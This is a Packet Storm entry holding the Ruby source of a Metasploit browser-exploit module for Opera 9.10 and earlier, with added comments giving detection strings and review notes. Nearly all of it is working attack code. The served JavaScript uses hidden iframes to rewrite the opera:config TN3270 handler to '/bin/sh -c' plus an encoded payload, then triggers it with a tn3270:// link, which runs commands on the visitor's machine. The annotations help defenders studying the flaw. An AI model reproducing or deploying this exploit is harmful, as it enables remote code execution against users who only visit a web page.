Opera 9 Configuration Overwrite

2009-10-27T00:00:00
ID PACKETSTORM:82263
Type packetstorm
Reporter Packet Storm
Modified 2009-10-27T00:00:00

Description

                                        
                                            `##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
# Metasploit browser-exploit module for the Opera <= 9.10 issue summarised in
# 'Description' below: script served from this module's HTTP listener reaches
# the opera:config preference page and rewrites the 'Network'/'TN3270 App'
# external-handler setting (see generate_evil_js).
#
# Defender notes (everything here is read from the code below):
#  * Scope: the module limits its own claim to Opera <= 9.10; the page does not
#    state the fixed release, so treat later versions as "not covered here"
#    rather than "known safe" until confirmed.
#  * Detection: the HTML this module serves always carries the literal strings
#    'opera:config', 'opera:cache', 'TN3270 App', 'opera.setPreference' and a
#    'tn3270://' href inside a <script> block; content rules on a web proxy or
#    IDS for those strings in text/html responses match the unmodified module.
#  * Host artefact: on success the handler is set to '/bin/sh -c <payload>' and
#    restored about 1 s later (setTimeout ... 1000), so the durable evidence is
#    a /bin/sh process, presumably spawned by the browser (confirm), rather
#    than a persistently changed preference.
class Metasploit3 < Msf::Exploit::Remote  
  
#  
# This module acts as an HTTP server  
#  
include Msf::Exploit::Remote::HttpServer::HTML  
  
include Msf::Exploit::Remote::BrowserAutopwn  
autopwn_info({  
:ua_name => HttpClients::OPERA,  
# NOTE(review): "1.0" does not match the "<= 9.10" range given in
# 'Description' below; confirm which value BrowserAutopwn should compare.
:ua_ver => "1.0",  
:os_name => [ OperatingSystems::WINDOWS, OperatingSystems::LINUX ],  
:javascript => true,  
# NOTE(review): the EXE generation in on_request_uri is commented out and a
# placeholder body is served instead, so "reliable exe writer" does not
# describe the code as shipped.
:rank => ExcellentRanking, # reliable exe writer  
# No client-side vulnerability test is supplied; presumably BrowserAutopwn
# then falls back to the ua_name/ua_ver match above alone -- confirm.
:vuln_test => nil,  
})  
  
# Module metadata for the framework (name, affected versions, payload
# constraints, targets). Only the Unix command target is enabled; the Windows
# target is commented out below and the matching EXE generation in
# on_request_uri is a placeholder.
#
# @param info [Hash] framework-supplied defaults merged by update_info
def initialize(info = {})  
super(update_info(info,{  
'Name' => 'Opera 9 Configuration Overwrite',  
'Description' => %q{  
Opera web browser in versions <= 9.10 allows unrestricted script  
access to its configuration page, opera:config, allowing an  
attacker to change settings and potentially execute arbitrary  
code.  
},  
'License' => BSD_LICENSE,  
'Author' =>  
[  
'egypt', # stolen from mpack  
],  
'Version' => '$Revision: 6655 $',  
# No public identifier (CVE/OSVDB/vendor advisory) is given on this page.
'References' => [ ],  
'Payload' =>  
{  
'ExitFunc' => 'process',  
'Space' => 2048,  
'DisableNops' => true,  
# Payload bytes the module refuses. The payload reaches the client
# '%'-hex-escaped (Rex::Text.to_hex in generate_evil_js) and is unescape()d
# there before being appended to '/bin/sh -c ', so presumably these are
# characters the resulting handler invocation cannot carry -- the page gives
# no rationale; confirm.
'BadChars' => " |'<>&",  
},  
'Targets' =>  
[  
# Windows target disabled: the payload branch of on_request_uri would have
# to serve a PE, and that code is commented out there as well.
#[ 'Opera < 9.10 Windows',   
# {  
# 'Platform' => 'win',  
# 'Arch' => ARCH_X86,  
# }  
#],  
[ 'Opera < 9.10 Unix Cmd',   
{  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
}  
],  
],  
# Not sure when this was disclosed but it's been known since at  
# least March 5, 2007, since that's the release date on the version  
# of mpack I stole this from.  
'DisclosureDate' => 'Mar 5 2007'  
}))  
end  
  
# HTTP handler for every request that reaches the module's listener.
#
# @param cli     connected client (peer address, payload regeneration)
# @param request parsed request; only request.uri is consulted
#
# Routes:
#  * URIs ending in "payload": intended to serve a generated executable, but
#    the PE generation is commented out and the body is the literal "foo", so
#    this branch cannot serve a working binary.
#  * get_resource (the module's own URI): serves the HTML wrapping the script
#    from generate_evil_js as text/html.
#  * anything else: 404 via send_not_found.
#
# The return value is not used; the response is written through
# send_response_html / send_not_found.
def on_request_uri(cli, request)  
  
case request.uri  
when /payload$/  
print_status("Generating payload for #{target} #{target.platform}")  
# Re-generate the payload  
# A nil payload is handled here with a 404; generate_evil_js has no
# equivalent guard (see NOTE there).
if ((p = regenerate_payload(cli)) == nil)  
print_error("Payload generation failed, 404ing request for #{request.uri}")  
send_not_found(cli)  
return  
end  
# NOTE: Change this to the new API when commiting to trunk  
#content = Msf::Util::EXE.to_win32pe(p.encoded)  
#content = Rex::Text.to_win32pe(p.encoded)  
# Placeholder body: the generated payload p is not used in this branch.
content = "foo"  
print_status("Generated #{content.length} bytes")  
headers = { 'Content-Type' => 'application/octet-stream' }  
when get_resource  
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")  
# Minimal HTML shell: no head, no encoding, just an inline <script> block.
content = "<body><script>"  
content << generate_evil_js(cli, request)  
content << "</script></body>"  
headers = { 'Content-Type' => 'text/html' }  
else  
print_status("404ing request for #{request.uri}")  
send_not_found(cli)  
return  
end  
send_response_html(cli, content, headers)  
  
end  
  
# Builds the JavaScript served by on_request_uri for the get_resource URI and
# returns it as a String (the heredoc assignment is the method's last
# expression).
#
# @param cli     connected client, passed to regenerate_payload
# @param request unused in this method
#
# What the heredoc does, as written: it appends a hidden about:blank iframe
# and evals inside it; that code adds opera:config and opera:cache iframes;
# once opera:cache has loaded it evals inside the opera:config iframe to save
# the 'Network'/'TN3270 App' preference, replace it with '/bin/sh -c ' plus
# the unescaped payload, click a freshly created 'tn3270://...' link, and
# restore the saved value via setTimeout after 1000 ms.
#
# NOTE(review): regenerate_payload(cli) is used here without the nil check
# that on_request_uri performs, so a failed payload build raises
# NoMethodError on .encoded instead of producing a 404.
def generate_evil_js(cli, request)  
# There are a bunch of levels of quotes here, so the easiest way to  
# make everything line up is to hex escape the command to run  
p = regenerate_payload(cli).encoded  
#print_status(p)  
# '%XX' encoding so the client-side unescape() in the heredoc recovers the
# original bytes.
shellcode = Rex::Text.to_hex(p, "%")  
js = <<ENDJS  
blank_iframe = document.createElement('iframe');  
blank_iframe.src = 'about:blank';  
blank_iframe.setAttribute('id', 'blank_iframe_window');  
blank_iframe.setAttribute('style', 'display:none');  
document.body.appendChild(blank_iframe);  
blank_iframe_window.eval(  
"config_iframe = document.createElement('iframe');" +  
"config_iframe.setAttribute('id', 'config_iframe_window');" +  
"config_iframe.src = 'opera:config';" +  
"document.body.appendChild(config_iframe);" +  
"cache_iframe = document.createElement('iframe');" +  
"cache_iframe.src = 'opera:cache';" +  
"cache_iframe.onload = function ()" +  
"{" +  
" config_iframe_window.eval" +  
" (\\"" +  
" old_handler = opera.getPreference('Network','TN3270 App');" +  
" shellcode = '#{shellcode}';" +  
" opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +  
" app_link = document.createElement('a');" +  
" app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +  
" app_link.click();" +  
" setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +  
" \\");" +  
"};" +  
"document.body.appendChild(cache_iframe);" +  
"");  
ENDJS  
  
end  
  
# Empty stub: defined but never called inside this module; returns nil.
def generate_evil_preference()  
  
end  
  
end  
  
  
`